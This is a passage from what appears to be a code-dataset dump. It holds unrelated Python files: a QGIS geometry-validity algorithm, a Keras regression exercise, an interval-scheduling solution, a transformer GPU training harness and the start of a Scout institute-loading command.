ERROR_OUTPUT = 'ERROR_OUTPUT'\n ERROR_COUNT = 'ERROR_COUNT'\n IGNORE_RING_SELF_INTERSECTION = 'IGNORE_RING_SELF_INTERSECTION'\n\n def icon(self):\n return QgsApplication.getThemeIcon(\"/algorithms/mAlgorithmCheckGeometry.svg\")\n\n def svgIconPath(self):\n return QgsApplication.iconPath(\"/algorithms/mAlgorithmCheckGeometry.svg\")\n\n def group(self):\n return self.tr('Vector geometry')\n\n def groupId(self):\n return 'vectorgeometry'\n\n def tags(self):\n return self.tr('valid,invalid,detect,error').split(',')\n\n def __init__(self):\n super().__init__()\n\n def initAlgorithm(self, config=None):\n self.methods = [self.tr('The one selected in digitizing settings'),\n 'QGIS',\n 'GEOS']\n\n self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT_LAYER,\n self.tr('Input layer')))\n self.addParameter(QgsProcessingParameterEnum(self.METHOD,\n self.tr('Method'), self.methods, defaultValue=2))\n self.parameterDefinition(self.METHOD).setMetadata({\n 'widget_wrapper': {\n 'useCheckBoxes': True,\n 'columns': 3}})\n\n self.addParameter(QgsProcessingParameterBoolean(self.IGNORE_RING_SELF_INTERSECTION,\n self.tr('Ignore ring self intersections'), defaultValue=False))\n\n self.addParameter(QgsProcessingParameterFeatureSink(self.VALID_OUTPUT, self.tr('Valid output'), QgsProcessing.TypeVectorAnyGeometry, None, True))\n self.addOutput(QgsProcessingOutputNumber(self.VALID_COUNT, self.tr('Count of valid features')))\n\n self.addParameter(QgsProcessingParameterFeatureSink(self.INVALID_OUTPUT, self.tr('Invalid output'), QgsProcessing.TypeVectorAnyGeometry, None, True))\n self.addOutput(QgsProcessingOutputNumber(self.INVALID_COUNT, self.tr('Count of invalid features')))\n\n self.addParameter(QgsProcessingParameterFeatureSink(self.ERROR_OUTPUT, self.tr('Error output'), 
QgsProcessing.TypeVectorAnyGeometry, None, True))\n self.addOutput(QgsProcessingOutputNumber(self.ERROR_COUNT, self.tr('Count of errors')))\n\n def name(self):\n return 'checkvalidity'\n\n def displayName(self):\n return self.tr('Check validity')\n\n def processAlgorithm(self, parameters, context, feedback):\n ignore_ring_self_intersection = self.parameterAsBoolean(parameters, self.IGNORE_RING_SELF_INTERSECTION, context)\n method_param = self.parameterAsEnum(parameters, self.METHOD, context)\n if method_param == 0:\n settings = QgsSettings()\n method = int(settings.value(settings_method_key, 0)) - 1\n method = max(method, 0)\n else:\n method = method_param - 1\n\n return self.doCheck(\n method, parameters, context, feedback, ignore_ring_self_intersection\n )\n\n def doCheck(self, method, parameters, context, feedback, ignore_ring_self_intersection):\n flags = QgsGeometry.FlagAllowSelfTouchingHoles if ignore_ring_self_intersection else QgsGeometry.ValidityFlags()\n source = self.parameterAsSource(parameters, self.INPUT_LAYER, context)\n if source is None:\n raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT_LAYER))\n\n (valid_output_sink, valid_output_dest_id) = self.parameterAsSink(parameters, self.VALID_OUTPUT, context,\n source.fields(), source.wkbType(), source.sourceCrs())\n valid_count = 0\n\n invalid_fields = source.fields()\n invalid_fields.append(QgsField('_errors', QVariant.String, 'string', 255))\n (invalid_output_sink, invalid_output_dest_id) = self.parameterAsSink(parameters, self.INVALID_OUTPUT, context,\n invalid_fields, source.wkbType(), source.sourceCrs())\n invalid_count = 0\n\n error_fields = QgsFields()\n error_fields.append(QgsField('message', QVariant.String, 'string', 255))\n (error_output_sink, error_output_dest_id) = self.parameterAsSink(parameters, self.ERROR_OUTPUT, context,\n error_fields, QgsWkbTypes.Point, source.sourceCrs())\n error_count = 0\n\n features = source.getFeatures(QgsFeatureRequest(), QgsProcessingFeatureSource.FlagSkipGeometryValidityChecks)\n total = 100.0 / source.featureCount() if source.featureCount() else 0\n for current, inFeat in enumerate(features):\n if feedback.isCanceled():\n break\n geom = inFeat.geometry()\n attrs = inFeat.attributes()\n\n valid = True\n if not geom.isNull() and not geom.isEmpty():\n errors = list(geom.validateGeometry(Qgis.GeometryValidationEngine(method), flags))\n if errors:\n valid = False\n reasons = []\n for error in errors:\n errFeat = QgsFeature()\n error_geom = QgsGeometry.fromPointXY(error.where())\n errFeat.setGeometry(error_geom)\n errFeat.setAttributes([error.what()])\n if error_output_sink:\n error_output_sink.addFeature(errFeat, QgsFeatureSink.FastInsert)\n error_count += 1\n\n reasons.append(error.what())\n\n reason = \"\\n\".join(reasons)\n if len(reason) > 255:\n reason = reason[:252] + '…'\n attrs.append(reason)\n\n outFeat = QgsFeature()\n outFeat.setGeometry(geom)\n outFeat.setAttributes(attrs)\n\n if valid:\n if valid_output_sink:\n valid_output_sink.addFeature(outFeat, QgsFeatureSink.FastInsert)\n valid_count += 1\n\n else:\n if invalid_output_sink:\n invalid_output_sink.addFeature(outFeat, QgsFeatureSink.FastInsert)\n invalid_count += 1\n\n feedback.setProgress(int(current * total))\n\n results = {\n self.VALID_COUNT: valid_count,\n self.INVALID_COUNT: invalid_count,\n self.ERROR_COUNT: error_count\n }\n if valid_output_sink:\n results[self.VALID_OUTPUT] = valid_output_dest_id\n if invalid_output_sink:\n results[self.INVALID_OUTPUT] = invalid_output_dest_id\n if 
error_output_sink:\n results[self.ERROR_OUTPUT] = error_output_dest_id\n return results\n","repo_name":"qgis/QGIS","sub_path":"python/plugins/processing/algs/qgis/CheckValidity.py","file_name":"CheckValidity.py","file_ext":"py","file_size_in_byte":8213,"program_lang":"python","lang":"en","doc_type":"code","stars":8946,"dataset":"github-code","pt":"7"} +{"seq_id":"13485668624","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow import keras as K\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\nfile = 'C:\\\\Users\\\\rarraiz\\\\Desktop\\\\Machine Learning\\\\Insumos\\\\concrete_data.csv'\r\ndf = pd.read_csv(file)\r\n\r\n'''Veamos las dimensiones'''\r\ndf.shape\r\n\r\n'''Estadisticas Descriptivas'''\r\ndf.describe()\r\n\r\n'''Revisar Valores Nulos'''\r\ndf.isnull().sum()\r\n\r\n'''Objetivo'''\r\ntarget = 'Strength'\r\n\r\nX = df.copy()\r\n\r\ny = X.pop(target)\r\n\r\nn_cols = X.shape[1]\r\ninput_shape = (n_cols)\r\n\r\n'''\r\nPart A: Build a baseline model (5 marks)'''\r\n\r\n'''Build a Neural Network'''\r\n\r\n\r\n# define regression model\r\ndef regression_model(network_arch,\r\n input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n ):\r\n \"\"\"\r\n Function to build the regression model\r\n\r\n parameters:\r\n -----------\r\n - network_arch: dictionary with the following structure\r\n {\"layer_1\": {\"u_units\": n, \"activation\": activation},\r\n ...\r\n \"layer_n\": {\"u_units\"}\r\n }\r\n - input_shape: tuple with the shape of the input\r\n - optimizer: string, name of the optimizer to use\r\n - loss: string, name of the loss function to minimize\r\n\r\n returns:\r\n --------\r\n - A compiled model\r\n \"\"\"\r\n\r\n # create model\r\n model = Sequential()\r\n\r\n nlayers = len(network_arch)\r\n final_layer = \"layer_\" + str(nlayers)\r\n\r\n for k, layer in network_arch.items():\r\n n_units = layer.get(\"n_units\")\r\n activation = layer.get(\"activation\")\r\n if k == \"layer_1\":\r\n model.add(Dense(n_units, activation=activation, input_shape=input_shape))\r\n elif k == final_layer:\r\n model.add(Dense(n_units))\r\n else:\r\n model.add(Dense(n_units, activation=activation))\r\n\r\n # compile model\r\n model.compile(optimizer=optimizer, loss=loss)\r\n\r\n return model\r\n\r\n# model architecture\r\nmodel_architecture1 = {\"layer_1\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_2\": {\"n_units\": 1},\r\n }\r\n\r\nprint()\r\nprint(\"input_shape = {}\".format(input_shape))\r\nprint(\"network_config = {}\".format(model_architecture1))\r\nprint()\r\n\r\n# import the metric to evaluate the model performance\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\n# Define a function for the loops\r\ndef train_and_test_several_models(X, y,\r\n test_size,\r\n model_arch,\r\n input_shape,\r\n optimizer,\r\n loss,\r\n niterations,\r\n epochs,\r\n pred_norm=False,\r\n seed=345,\r\n verbose=2,\r\n ):\r\n \"\"\"\r\n Function for training and testing several model on random train/test splits\r\n\r\n parameters:\r\n -----------\r\n - X,y: the data. X are the predictors and y the target\r\n - seed: int, with a seed to be used in the train/test splitting\r\n - test_size: float (0,0.5). Size of the test-sample as a fraction of the whole data-set\r\n - model_arch: dict. 
Architecture of the model (see regression_model above)\r\n - input_shape: 2-tuple with the input shape\r\n - optimizer: string. optimizer name\r\n - loss: string. loss function name\r\n - niterations: int. number of iterations to perform the train/test split, model training and testing\r\n - epoch: int. number of epochs for model training\r\n - pred_norm: bool. If True will apply normalization on the predictors\r\n - verbose: int >= 0. level of verbosity.\r\n\r\n returns:\r\n --------\r\n - mse_results: np.array with the sqrt(mse) metric evaluated on the test-samples\r\n \"\"\"\r\n\r\n # Array to store the results of the model evaluation on the test set\r\n metric_list = np.zeros(niterations)\r\n\r\n print()\r\n print(\"Launching {} iterations of\".format(niterations))\r\n print(\" - train/test split => test_size = {}\".format(test_size))\r\n if pred_norm:\r\n print(\" - Apply predictors normalization\")\r\n else:\r\n print(\" - No predictors normalization\")\r\n print(\" - model architecture: {}\".format(model_arch))\r\n print(\" - model training:\")\r\n print(\" * epochs = {}\".format(epochs))\r\n print(\" * optimizer = {}\".format(optimizer))\r\n print(\" * loss = {}\".format(loss))\r\n print()\r\n\r\n # Start the loop\r\n for i in range(niterations):\r\n # Apply the train test split\r\n myseed = seed + i * 2 # seed used for the train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=myseed)\r\n\r\n # Start by building the model\r\n model = regression_model(network_arch=model_arch,\r\n input_shape=input_shape,\r\n optimizer=optimizer,\r\n loss=loss)\r\n\r\n if pred_norm:\r\n # If requested apply predictors normalization\r\n # first calculate the mean and std on the train-sample\r\n X_train_mean = X_train.mean()\r\n X_train_std = X_train.std()\r\n\r\n # then apply them on both, the train and test samples\r\n X_train = (X_train - X_train_mean) / X_train_std\r\n X_test = (X_test - X_train_mean) / X_train_std\r\n\r\n myverbose = 0\r\n if i == 0:\r\n myverbose = verbose\r\n print(\"Train/test splitting for iteration {}\".format(i + 1))\r\n print(\" X_train.shape = {}\".format(X_train.shape))\r\n print(\" y_train.shape = {}\".format(y_train.shape))\r\n print(\" X_test.shape = {}\".format(X_test.shape))\r\n print(\" y_test.shape = {}\".format(y_test.shape))\r\n print(X_train.head())\r\n print()\r\n print(\"Model summary for iteration {}\".format(i + 1))\r\n model.summary()\r\n print()\r\n print()\r\n\r\n # Model training\r\n model.fit(X_train, y_train, epochs=epochs, verbose=verbose)\r\n\r\n # model predictions on test sample\r\n y_pred = model.predict(X_test)\r\n\r\n # Model evaluation on test sample\r\n result = np.sqrt(mean_squared_error(y_test, y_pred))\r\n print(\"{}: sqrt(mse) = {}\".format(i + 1, result))\r\n metric_list[i] = result\r\n\r\n print()\r\n\r\n return metric_list\r\n\r\nniterations = 50 # Number of iterations\r\ntest_size = 0.3 # test sample size\r\n\r\nsq_mse_list_A = train_and_test_several_models(X = X,\r\n y = y,\r\n test_size = test_size,\r\n model_arch = model_architecture1,\r\n input_shape = input_shape,\r\n optimizer = \"adam\",\r\n loss = \"mean_squared_error\",\r\n niterations = niterations,\r\n epochs = 50,\r\n seed = 345,\r\n verbose = 0,\r\n pred_norm = False,\r\n )\r\n\r\n# Calculate the mean and the standard deviation of the metric on the 50 samplings\r\nmean_sqmse_A = np.mean(sq_mse_list_A)\r\nstd_sqmse_A = np.std(sq_mse_list_A)\r\n\r\n# Generate a data frame to store the results of the differents parts 
of this project\r\ndf_results = pd.DataFrame.from_dict({\"Part\": [\"A\"],\"mean_sq_mse\": [mean_sqmse_A], \"std_sq_mse\": [std_sqmse_A]})\r\ndf_results\r\n\r\n# Define some common parameters for plotting\r\nfigsize = (10,8)\r\nnbins = 20\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef plot_results(result_list,\r\n label_list,\r\n var_name=\"sq(mse)\",\r\n figsize=(15, 10),\r\n nbins=10):\r\n \"\"\"\r\n plotting function\r\n\r\n parameters:\r\n -----------\r\n - result_list: list of np.arrays with the metrics of the niterations\r\n - label_list: list of labels\r\n \"\"\"\r\n\r\n if len(result_list) != len(label_list):\r\n raise ValueError(\"lenghts of result_list and label_list has to be the same\")\r\n\r\n if len(result_list) == 0:\r\n raise ValueError(\"lenght of result_list has to be > 0\")\r\n\r\n color_list = [\"b\", \"r\", \"m\", \"y\"]\r\n\r\n xmin = +1.0e+20\r\n xmax = -1.0e+20\r\n for arr in result_list:\r\n min_tmp = np.amin(arr)\r\n max_tmp = np.amax(arr)\r\n\r\n if xmin > min_tmp:\r\n xmin = min_tmp\r\n if xmax < max_tmp:\r\n xmax = max_tmp\r\n\r\n percent = 0.01\r\n delta = xmax - xmin\r\n xmin -= percent * delta\r\n xmax += percent * delta\r\n\r\n bins = np.linspace(xmin, xmax, nbins + 1)\r\n\r\n fig, ax = plt.subplots(nrows=1, ncols=1, figsize=figsize)\r\n\r\n porcent = 0.05\r\n ymax = -1.0e+20\r\n for i, arr in enumerate(result_list):\r\n n, _, _ = ax.hist(x=arr,\r\n bins=bins,\r\n color=color_list[i],\r\n alpha=0.5,\r\n density=False,\r\n label=label_list[i]\r\n )\r\n\r\n if ymax < np.amax(n):\r\n ymax = np.amax(n)\r\n\r\n # Add some text for labels, title and custom x-axis tick labels, etc.\r\n ax.legend()\r\n ax.set_xlim([bins[0], bins[-1]])\r\n ax.set_ylim([0, ymax * (1.0 + porcent)])\r\n ax.set_xlabel(var_name)\r\n ax.set_ylabel('Occurences')\r\n ax.set_title(var_name + ' distribution')\r\n\r\n fig.tight_layout()\r\n\r\n plt.show()\r\n\r\n '''Part B: Normalize the data (5 marks)'''\r\n\r\n # Just launch the function above (train_and_test_several_models), but with pred_norm = True\r\n sq_mse_list_B = train_and_test_several_models(X=X,\r\n y=y,\r\n test_size=test_size,\r\n model_arch=model_architecture1,\r\n input_shape=input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n niterations=niterations,\r\n epochs=50,\r\n seed=3675,\r\n verbose=0,\r\n pred_norm=True,\r\n )\r\n\r\n # Calculate the mean and the standard deviation of the metric on the 50 samplings\r\n mean_sqmse_B = np.mean(sq_mse_list_B)\r\n std_sqmse_B = np.std(sq_mse_list_B)\r\n\r\n df_results.loc[df_results.shape[0]] = [\"B\", mean_sqmse_B, std_sqmse_B]\r\n df_results\r\n\r\n plot_results(result_list=[sq_mse_list_A, sq_mse_list_B],\r\n label_list=[\"Part A\", \"Part B\"],\r\n var_name=\"sq(mse)\",\r\n figsize=figsize,\r\n nbins=nbins)\r\n\r\n '''Part C: Increate the number of epochs (5 marks)'''\r\n\r\n # Just launch the function above (train_and_test_several_models), but with pred_norm = True and epochs = 100\r\n sq_mse_list_C = train_and_test_several_models(X=X,\r\n y=y,\r\n test_size=test_size,\r\n model_arch=model_architecture1,\r\n input_shape=input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n niterations=niterations,\r\n epochs=100,\r\n seed=3675,\r\n verbose=0,\r\n pred_norm=True,\r\n )\r\n\r\n # Calculate the mean and the standard deviation of the metric on the 50 samplings\r\n mean_sqmse_C = np.mean(sq_mse_list_C)\r\n std_sqmse_C = np.std(sq_mse_list_C)\r\n\r\n df_results.loc[df_results.shape[0]] = [\"C\", mean_sqmse_C, std_sqmse_C]\r\n 
df_results\r\n\r\n plot_results(result_list=[sq_mse_list_A, sq_mse_list_B, sq_mse_list_C],\r\n label_list=[\"Part A\", \"Part B\", \"Part C\"],\r\n var_name=\"sq(mse)\",\r\n figsize=figsize,\r\n nbins=nbins)\r\n\r\n '''Part D: Increase the number of hidden layers (5 marks)'''\r\n\r\n # Define the new architecture\r\n # model architecture\r\n model_architecture2 = {\"layer_1\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_2\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_3\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_4\": {\"n_units\": 1},\r\n }\r\n\r\n print()\r\n print(\"input_shape = {}\".format(input_shape))\r\n print(\"network_config = {}\".format(model_architecture2))\r\n print()\r\n\r\n # Just launch the function above (train_and_test_several_models), but with pred_norm = True\r\n # and model_arch = model_architecture2 and epochs = 100\r\n sq_mse_list_D = train_and_test_several_models(X=X,\r\n y=y,\r\n test_size=test_size,\r\n model_arch=model_architecture2,\r\n input_shape=input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n niterations=niterations,\r\n epochs=50,\r\n seed=3675,\r\n verbose=0,\r\n pred_norm=True,\r\n )\r\n\r\n # Calculate the mean and the standard deviation of the metric on the 50 samplings\r\n mean_sqmse_D = np.mean(sq_mse_list_D)\r\n std_sqmse_D = np.std(sq_mse_list_D)\r\n\r\n df_results.loc[df_results.shape[0]] = [\"D\", mean_sqmse_D, std_sqmse_D]\r\n df_results\r\n\r\n plot_results(result_list=[sq_mse_list_A, sq_mse_list_B, sq_mse_list_C, sq_mse_list_D],\r\n label_list=[\"Part A\", \"Part B\", \"Part C\", \"Part D\"],\r\n var_name=\"sq(mse)\",\r\n figsize=figsize,\r\n nbins=nbins)\r\n\r\n","repo_name":"Raalejoo/Build-a-Regression-Model-in-Keras","sub_path":"Keras.py","file_name":"Keras.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1908430394","text":"'''\n\nKMIT hosting a Keshav Memorial Badminton League. They planned to conduct\nN number of games. Each game begin and ends in perticular time slot.\n\nYou are given an array of time slots of the N games, consisting of\nbegin and end times (b1,e1),(b2,e2),... 
(b < e ).\nYour task is to determine minimum number of badminton courts required \nto conduct all the games smoothly.\n\nNOTE: If a game begins at time 'a' ends at time 'b', \nanother game can start at 'b'.\n\nInput Format:\n-------------\nLine-1: An integer N, number of games.\nNext N lines: Two space separated integers, begin and end time of each game.\n\nOutput Format:\n--------------\nPrint an integer, minimum number of badminton courts required.\n\n\nSample Input-1:\n---------------\n3\n0 30\n5 10\n15 20\n\nSample Output-1:\n----------------\n2\n\nSample Input-2:\n---------------\n3\n0 10\n15 25\n25 35\n\nSample Output-2:\n----------------\n1\n\n\n\n'''\n\n#Solution\n\ndef BadmintonCourts(intervals):\n start = sorted([i[0] for i in intervals])\n end = sorted([i[1] for i in intervals])\n \n s = 0\n e = 0\n count = 0\n res = 0\n\n while s < len(start):\n if start[s] < end[e]:\n count += 1\n s += 1\n else:\n count -= 1\n e += 1\n res = max(res, count)\n return res\nn=int(input())\nintervals=[]\nfor i in range(n):\n row=list(map(int,input().split()))\n intervals.append(row)\nprint(BadmintonCourts(intervals))","repo_name":"sharuk2k3/FS-Elite-2021-22","sub_path":"Day-27/Day_27_P_1.py","file_name":"Day_27_P_1.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"22672685746","text":"import functools\nimport warnings\n\nimport yaml\nimport utils\nfrom utils.sync_control import *\nimport numpy as np\nimport torch\nimport time\nimport torch.nn as nn\nimport torch.optim as optim\nfrom utils.sync_info import BasicSyncInfo, ConcurrentSyncInfo\nimport yaml\nimport transformer.lamb as lamb\nfrom transformer.data_utils import *\nfrom transformer.mem_transformer import MemTransformerLM\nimport sys\nimport os\n# try:\n# from apex import amp\n# except ModuleNotFoundError:\n# warnings.warn('APEX AMP is unavailable')\n\n\ndataset = 'wt103'\nvocab = 'word'\n\ndef init_weight(weight, model_consts):\n # if init == 'uniform':\n # nn.init.uniform_(weight, -0.1, 0.1)\n # elif init == 'normal':\n nn.init.normal_(weight, 0.0, model_consts['init_std'])\n\n\ndef init_bias(bias):\n nn.init.constant_(bias, 0.0)\n\n\ndef weights_init(m, model_consts):\n proj_init_std = 0.01\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n if hasattr(m, 'weight') and m.weight is not None:\n init_weight(m.weight, model_consts)\n if hasattr(m, 'bias') and m.bias is not None:\n init_bias(m.bias)\n elif classname.find('AdaptiveEmbedding') != -1:\n if hasattr(m, 'emb_projs'):\n for i in range(len(m.emb_projs)):\n if m.emb_projs[i] is not None:\n nn.init.normal_(m.emb_projs[i], 0.0, proj_init_std)\n elif classname.find('Embedding') != -1:\n if hasattr(m, 'weight'):\n init_weight(m.weight, model_consts)\n elif classname.find('ProjectedAdaptiveLogSoftmax') != -1:\n if hasattr(m, 'cluster_weight') and m.cluster_weight is not None:\n init_weight(m.cluster_weight, model_consts)\n if hasattr(m, 'cluster_bias') and m.cluster_bias is not None:\n init_bias(m.cluster_bias)\n if hasattr(m, 'out_projs'):\n for i in range(len(m.out_projs)):\n if m.out_projs[i] is not None:\n nn.init.normal_(m.out_projs[i], 0.0, proj_init_std)\n if hasattr(m, 'out_layers_weights'):\n for i in range(len(m.out_layers_weights)):\n if m.out_layers_weights[i] is not None:\n init_weight(m.out_layers_weights[i], model_consts)\n elif classname.find('LayerNorm') != -1:\n if hasattr(m, 'weight'):\n nn.init.normal_(m.weight, 1.0, model_consts['init_std'])\n 
if hasattr(m, 'bias') and m.bias is not None:\n init_bias(m.bias)\n elif classname.find('TransformerLM') != -1:\n if hasattr(m, 'r_emb'):\n init_weight(m.r_emb, model_consts)\n if hasattr(m, 'r_w_bias'):\n init_weight(m.r_w_bias, model_consts)\n if hasattr(m, 'r_r_bias'):\n init_weight(m.r_r_bias, model_consts)\n if hasattr(m, 'r_bias'):\n init_bias(m.r_bias)\n\n\ndef setup(model_config, shared_config, device):\n # Before we do anything with models, we want to ensure that we get fp16\n # execution of torch.einsum in APEX AMP.\n # Otherwise it'll default to \"promote\" mode, and we'll get fp32 operations.\n # Note that running `--apex_amp_opt_level O2` will remove the need for this\n # code, but it is still valid.\n # if 'apex' in sys.modules:\n # amp.register_half_function(torch, 'einsum')\n\n\n arch = model_config['arch']\n with open(f\"{os.path.expanduser( '~' )}/orion/related/baselines/transformer/transformer_consts.yaml\", 'r') as file:\n model_consts = yaml.load(file, Loader=yaml.FullLoader)[arch]\n\n batch_size = model_config['batch_size']\n\n ext_len = 0\n\n # adaptive softmax / embedding\n cutoffs, tie_projs = [], [False]\n if model_consts['adaptive']:\n cutoffs = [19997, 39997, 199997]\n tie_projs += [True] * len(cutoffs)\n sample_softmax = -1\n MemTransformerLM_kwargs = {\n 'n_token': 267735,\n 'n_layer': model_consts['n_layer'],\n 'n_head': model_consts['n_head'],\n 'd_model': model_consts['d_model'],\n 'd_head': model_consts['d_head'],\n 'd_inner': model_consts['d_inner'],\n 'dropout': model_consts['dropout'],\n 'dropatt': model_consts['dropatt'],\n 'dtype': None,\n 'tie_weight': True,\n 'd_embed': model_consts['d_model'],\n 'div_val': model_consts['div_val'],\n 'tie_projs': tie_projs,\n 'pre_lnorm': False,\n 'tgt_len': model_consts['tgt_len'],\n 'ext_len': ext_len,\n 'mem_len': model_consts['mem_len'],\n 'cutoffs': cutoffs,\n 'same_length': False,\n 'attn_type': 0,\n 'clamp_len': -1,\n 'sample_softmax': sample_softmax,\n }\n\n # MemTransformerLM_kwargs = {\n # 'n_token': 267735,\n # 'n_layer': 16,\n # 'n_head': 8,\n # 'd_model': 512,\n # 'd_head': 64,\n # 'd_inner': 2048,\n # 'dropout': 0.1,\n # 'dropatt': 0.0,\n # 'dtype': None,\n # 'tie_weight': True,\n # 'd_embed': 512,\n # 'div_val': 1,\n # 'tie_projs': [False, True, True, True],\n # 'pre_lnorm': False,\n # 'tgt_len': 192,\n # 'ext_len': 0,\n # 'mem_len': 192,\n # 'cutoffs': [19997, 39997, 199997],\n # 'same_length': False,\n # 'attn_type': 0,\n # 'clamp_len': -1,\n # 'sample_softmax': -1\n # }\n model = MemTransformerLM(**MemTransformerLM_kwargs)\n # model.apply(functools.partial(weights_init, model_consts=model_consts))\n # ensure embedding init is not overridden by out_layer in case of weight sharing\n # model.word_emb.apply(functools.partial(weights_init, model_consts=model_consts))\n\n # jitlamb optimizer\n optimizer = lamb.Lamb(model.parameters(), lr=0.1)\n\n model = model.to(device)\n # scaler = None\n # if model_config['use_fp16']:\n # if model_config['amp'] == 'pytorch':\n # scaler = torch.cuda.amp.GradScaler()\n # elif model_config['amp'] == 'apex':\n # model, optimizer = amp.initialize(\n # model,\n # optimizer,\n # opt_level=model_config['apex_amp_opt_level'],\n # )\n\n\n pin_memory = shared_config['pin_memory']\n data = torch.ones((model_consts['tgt_len'], batch_size), pin_memory=pin_memory).to(torch.int64)\n target = torch.ones((model_consts['tgt_len'], batch_size), pin_memory=pin_memory).to(torch.int64)\n # The later two parts are not used in either training or inference. 
They are set to align its behavior with real loader.\n virtual_loader = utils.DummyDataLoader(batch=(data, target, 1, 1))\n # else:\n # corpus = get_lm_corpus(datadir=shared_config['wikitext_103_dir'], dataset='wt103', vocab=model_consts['vocab'])\n # tr_iter = corpus.get_iterator('train', batch_size, model_consts['tgt_len'], device=device, ext_len=ext_len)\n # train_iter = tr_iter.get_fixlen_iter()\n # virtual_loader = train_iter\n\n return model, virtual_loader, optimizer\n\n\ndef eval_wrapper(sync_info, tid: int, model_config, shared_config):\n utils.seed_everything(shared_config['seed'])\n device = torch.device(\"cuda:0\")\n\n if 'default' in shared_config and shared_config['default']:\n stream = torch.cuda.default_stream(device=device)\n else:\n if isinstance(sync_info, ConcurrentSyncInfo) and sync_info.isolation_level == 'thread':\n stream = torch.cuda.Stream(device=device, priority=-1 if tid == 0 else 0)\n else:\n stream = torch.cuda.Stream(device=device)\n\n model, data_loader, _ = setup(model_config, shared_config, device)\n model.eval()\n\n num_requests = model_config['num_iterations']\n num_warm_up_reqs = 10\n\n loader_iterator = iter(data_loader)\n\n mems = None\n def eval():\n nonlocal mems\n data, target, _, _ = next(loader_iterator)\n data = data.to(device)\n target = target.to(device)\n _, mems = model(data, target, mems)\n\n utils.measure(eval, num_requests, num_warm_up_reqs, model_config['request_rate'], tid, shared_config, stream, sync_info)\n\n\ndef train_wrapper(sync_info: BasicSyncInfo, tid: int, model_config, shared_config):\n utils.seed_everything(shared_config['seed'])\n device = torch.device(\"cuda:0\")\n\n if 'default' in shared_config and shared_config['default']:\n stream = torch.cuda.default_stream(device=device)\n else:\n if isinstance(sync_info, ConcurrentSyncInfo) and sync_info.isolation_level == 'thread':\n stream = torch.cuda.Stream(device=device, priority=-1 if tid == 0 else 0)\n else:\n stream = torch.cuda.Stream(device=device)\n\n model, data_loader, optimizer = setup(model_config, shared_config, device)\n\n model.train()\n\n # enable_autocast = model_config['use_fp16'] and model_config['amp'] == 'pytorch'\n mem = None\n clip = 0.25\n\n num_iterations = model_config['num_iterations']\n warm_up_iters = 10\n\n\n logging.info(f'transformer is set up with {num_iterations}')\n\n for batch_idx, (data, target, seq_len, _) in enumerate(data_loader):\n start = time.time()\n if batch_idx == warm_up_iters:\n # finish previous work\n stream.synchronize()\n sync_info.pre_measurement_prep(tid)\n # start timer\n start_time = time.time()\n\n data = data.to(device)\n target = target.to(device)\n with ForwardControl(thread_id=tid, batch_idx=batch_idx, sync_info=sync_info, stream=stream):\n with torch.cuda.stream(stream):\n # with torch.cuda.amp.autocast(enable_autocast):\n loss, mem = model(data, target, mem)\n loss = loss.float().mean().type_as(loss)\n\n with BackwardControl(thread_id=tid, batch_idx=batch_idx, sync_info=sync_info, stream=stream):\n with torch.cuda.stream(stream):\n # if model_config['use_fp16']:\n # if model_config['amp'] == 'pytorch':\n # scaler.scale(loss).backward()\n # scaler.unscale_(optimizer)\n # torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n # elif model_config['amp'] == 'apex':\n # with amp.scale_loss(loss, optimizer, delay_unscale=False) as scaled_loss:\n # scaled_loss.backward()\n # torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), clip)\n # else:\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), 
clip)\n\n # if model_config['use_fp16'] and model_config['amp'] == 'pytorch':\n # scaler.step(optimizer)\n # scaler.update()\n # else:\n optimizer.step()\n\n if not sync_info.should_continue_loop(tid, batch_idx, num_iterations):\n break\n\n stream.synchronize()\n duration = time.time() - start_time\n sync_info.post_measurement_prep(tid)\n sync_info.write_kv(f'duration-{tid}', duration)\n sync_info.write_kv(f'iterations-{tid}', batch_idx + 1)\n sync_info.write_kv(f'throughput-{tid}', (batch_idx-warm_up_iters)/duration)\n\n logging.info(f'tid {tid} it takes {duration} seconds to train transformer')\n return duration\n","repo_name":"eth-easl/orion","sub_path":"related/baselines/transformer/train_transformer.py","file_name":"train_transformer.py","file_ext":"py","file_size_in_byte":11228,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"42683660159","text":"import logging\n\nimport click\nfrom flask.cli import with_appcontext\n\nLOG = logging.getLogger(__name__)\n\nfrom scout.load import load_institute\nfrom scout.server.extensions import store\n\n\n@click.command('institute', short_help='Load a institute')\n@click.option('-i', '--internal-id',\n required=True)\n@click.option('-d', '--display-name')\n@click.option('-s', '--sanger-recipients', multiple=True)\n@with_appcontext\ndef institute(internal_id, display_name, sanger_recipients):\n \"\"\"\n Create a new institute and add it to the database\n\n \"\"\"\n adapter = store\n\n if not internal_id:\n LOG.warning(\"A institute has to have an internal id\")\n raise click.Abort()\n\n if not display_name:\n display_name = internal_id\n\n if sanger_recipients:\n sanger_recipients = list(sanger_recipients)\n\n try:\n load_institute(\n adapter=adapter,\n internal_id=internal_id,\n 